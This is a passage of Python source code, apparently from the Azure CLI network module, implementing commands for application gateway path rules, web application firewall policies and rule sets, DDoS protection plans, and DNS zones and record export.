resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
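    # fall back to the URL path map's defaults unless overridden; a redirect configuration
    # suppresses the default backend pool, and an explicit address pool suppresses the
    # default redirect configuration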
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
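# Illustrative sketch of the disabled-rules lookup performed above: rule groups are flattened
# and only the rule IDs the user asked to disable are kept, grouped per rule group. This is a
# minimal stand-in using plain namespaces instead of SDK models; the helper name
# _demo_group_disabled_rules and the sample rule data are hypothetical, and nothing calls it.
def _demo_group_disabled_rules():
    from types import SimpleNamespace
    rule_sets = [SimpleNamespace(rule_groups=[
        SimpleNamespace(rule_group_name='REQUEST-920', rules=[SimpleNamespace(rule_id=920100),
                                                              SimpleNamespace(rule_id=920120)]),
        SimpleNamespace(rule_group_name='REQUEST-930', rules=[SimpleNamespace(rule_id=930100)]),
    ])]
    disabled_rules = {'920120', '930100'}
    disabled_groups = []
    for group in (g for rs in rule_sets for g in rs.rule_groups):
        matched = [r.rule_id for r in group.rules if str(r.rule_id) in disabled_rules]
        if matched:
            disabled_groups.append({'rule_group_name': group.rule_group_name, 'rules': matched})
    return disabled_groups  # [{'rule_group_name': 'REQUEST-920', 'rules': [920120]}, ...]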
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
Initialize custom rule for WAF policy
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
        # NOTE: 'negation_conditon' (sic) is the parameter name exposed by the SDK model.
        negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
    Add a managed rule set to the WAF policy's managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
                    # Extend the existing rule group override with the requested rules
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
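# Minimal sketch of the for/else merge logic used above: an incoming rule set is merged into an
# existing set with the same type/version, or appended as a new one when the loop finds no match.
# The _demo_merge_rule_set name and the dict shapes are hypothetical stand-ins for the SDK models.
def _demo_merge_rule_set(existing_sets, new_set):
    for rule_set in existing_sets:
        if (rule_set['type'], rule_set['version']) == (new_set['type'], new_set['version']):
            rule_set['overrides'].extend(new_set['overrides'])  # merge into the existing rule set
            break
    else:
        existing_sets.append(new_set)  # the loop never hit 'break', so the rule set is new
    return existing_sets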
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
    Update (override) an existing rule set of the WAF policy's managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
                rg.rules = managed_rule_overrides  # replace (rather than extend) the rules; this differs from add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
    Remove a rule group from the managed rule set when rule_group_name is specified.
    Otherwise, remove the entire matching rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
            # Remove the specified rule group from the rule set
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# pylint: disable=line-too-long
# pylint: disable=too-many-nested-blocks
def add_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None, rule_ids=None):
ExclusionManagedRuleSet, ExclusionManagedRuleGroup, ExclusionManagedRule = \
cmd.get_models('ExclusionManagedRuleSet', 'ExclusionManagedRuleGroup', 'ExclusionManagedRule')
waf_policy = client.get(resource_group_name, policy_name)
# build current rules from ids
rules = [ExclusionManagedRule(rule_id=rule_id) for rule_id in rule_ids] if rule_ids is not None else []
# build current rule group from rules
curr_rule_group = None
if rule_group_name is not None:
curr_rule_group = ExclusionManagedRuleGroup(rule_group_name=rule_group_name,
rules=rules)
# build current rule set from rule group
curr_rule_set = ExclusionManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_groups=[curr_rule_group] if curr_rule_group is not None else [])
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_group in rule_set.rule_groups:
# add rules when rule group exists
if rule_group.rule_group_name == rule_group_name:
rule_group.rules.extend(rules)
break
else:
# add a new rule group
if curr_rule_group is not None:
rule_set.rule_groups.append(curr_rule_group)
break
else:
# add a new rule set
exclusion.exclusion_managed_rule_sets.append(curr_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
# pylint: disable=line-too-long
def remove_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None):
waf_policy = client.get(resource_group_name, policy_name)
to_be_deleted = None
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_group_name is None:
to_be_deleted = rule_set
break
rule_group = next((rule_group for rule_group in rule_set.rule_groups if rule_group.rule_group_name == rule_group_name), None)
if rule_group is None:
err_msg = f"Rule set group [{rule_group_name}] is not found."
raise ResourceNotFoundError(err_msg)
rule_set.rule_groups.remove(rule_group)
if to_be_deleted:
exclusion.exclusion_managed_rule_sets.remove(to_be_deleted)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
        # if no VNets are specified, a simple PUT is sufficient
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
        vnet_ids = set()
        # a single empty value means "detach all VNets"; otherwise collect the requested IDs
        if len(vnets) == 1 and not vnets[0]:
            pass
        else:
            vnet_ids = {x.id for x in vnets}
        existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set()
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
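# Sketch of the reconciliation performed above: the requested VNet IDs and the currently attached
# ones are diffed with plain set operations to decide what to attach and what to detach. The
# _demo_vnet_reconciliation name and the sample resource IDs are hypothetical.
def _demo_vnet_reconciliation():
    requested = {'/subscriptions/xxx/vnets/a', '/subscriptions/xxx/vnets/b'}
    existing = {'/subscriptions/xxx/vnets/b', '/subscriptions/xxx/vnets/c'}
    to_attach = requested.difference(existing)  # {'/subscriptions/xxx/vnets/a'}
    to_detach = existing.difference(requested)  # {'/subscriptions/xxx/vnets/c'}
    return to_attach, to_detach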
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add a delegation (NS) record for the newly created child zone in its parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
    :param parent_zone: the parent zone name or the resource ID of the parent zone.
                        If only the name is given, the current subscription and resource group are assumed.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
            print('Delegation added successfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
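# A few spot checks on the mapping above (illustrative only, never called): the lookup is
# case-insensitive, SPF records are stored on the TXT property, and CNAME/SOA map to singular
# attributes rather than lists. The _demo_type_to_property_name helper is hypothetical.
def _demo_type_to_property_name():
    assert _type_to_property_name('A') == 'a_records'
    assert _type_to_property_name('SPF') == 'txt_records'
    assert _type_to_property_name('cname') == 'cname_record'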
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
